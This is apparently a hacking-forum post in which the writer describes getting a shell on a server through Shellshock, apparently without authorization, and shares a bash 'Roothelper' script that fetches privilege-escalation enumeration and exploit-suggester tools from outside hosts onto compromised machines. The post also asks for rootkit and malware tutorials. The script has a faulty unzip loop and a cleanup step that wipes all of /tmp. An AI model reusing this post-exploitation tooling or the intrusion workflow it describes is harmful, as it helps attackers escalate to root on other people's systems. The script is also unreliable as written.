Man i wish i could do that. Hey lock, now that you're here i'd love to see some tech threads penned by you, i don't know if you know this but you're actually the one that got me interested in infosec way back on Zoklet. With regards to threads i know you don't like to write really long threads but if you'd be willing to create some awesome content i'd humbly request it to be on the topics of offensive security, or sec related coding, IDK all the languages you know but i know you're pretty advanced at bash. I've been looking into bash recently as well. I was playing around with shellshock and got an OS shell on this particular server, so then i wanted to root it like a proper hacker should. I found there were a number of enumeration shellscripts and exploit suggesters out there to run on the compromised machine to get a sense of what you're dealing with. I got a python script that searches for shellshock vulnerable hosts so having to manually 'wget' and unzip all the enumeration and exploit suggestion scripts by hand on each as you working the hosts would be a drag. So made a shellscript to automate the process.
#!/bin/bash
function usage()
{ printf "%b \a\n\nRoothelper will aid in the process of privilege escalation on a Linux system you compromised by fetching a number of enumeration
and exploit suggestion scripts. Below is a quick overview of the available options.
The 'Help' option displays this informational message.
The 'Download' option fetches the relevant files and places them in the /tmp/ directory.
The option 'Download and unzip' downloads all files and extracts the contents of zip archives to their individual subdirectories respectively, please
note; if the 'mkdir' command is unavailable however, the operation will not succeed and the 'Download' option should be used instead
The 'Clean up' option removes all downloaded files and 'Quit' exits roothelper.\n "
}
# Download and unzip
function dzip()
{ echo "Downloading and extracting scripts..."
`wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py`
`wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip`
`wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`
`wget -O /tmp/unixprivesc.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`
for zip in *.zip
do
dirname=`echo $zip | sed 's/\.zip$//'`
if mkdir $dirname
then
if cd $dirname
then
unzip ../$zip
cd ..
rm -f $zip
else
echo "Could not unpack $zip - cd failed"
fi
else
echo "Could not unpack $zip - mkdir failed"
fi
done
}
dir="/tmp/"
usage
printf "%b" "\a\n\nTo use roothelper please select an option below.:\n"
PS3='Please enter your choice: '
options=("Help" "Download" "Download and unzip" "Clean up" "Quit")
select opt in "${options[@]}"
do
case $opt in
"Help")
usage
printf "%b \n"
;;
"Download")
echo "Downloading scripts to /tmp/"
`wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py`
`wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip`
`wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`
`wget -O /tmp/unixprivesc.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`
printf "%b \n"
;;
"Download and unzip")
dzip
printf "%b \n"
;;
"Clean up")
echo "Removing downloaded files"
find $dir/* -exec rm {} \;
printf "%b \n"
;;
"Quit")
break
;;
*) echo invalid option;;
esac
done
I want your honest opinion on this, personally i thought it was pretty useful for us plebs that can't mind meld with the computer. I'd love to know more bash and it's application in a security setting. Furthermore i'm really interested in malware and not the HunterExploit Kit skidware but homecooked malware of the dankest kind, including rootkits. If you'd be willing to make a thread to grant some insight on these topics i'd be very grateful. Also, an introduction to reverse engineering and exploit development with Immunity Debugger(If you use it) would be greatly appreciated.
Also Iam asked me to ask you if you'd be interested in setting up a specific kind of hidden service. Thanks man <3
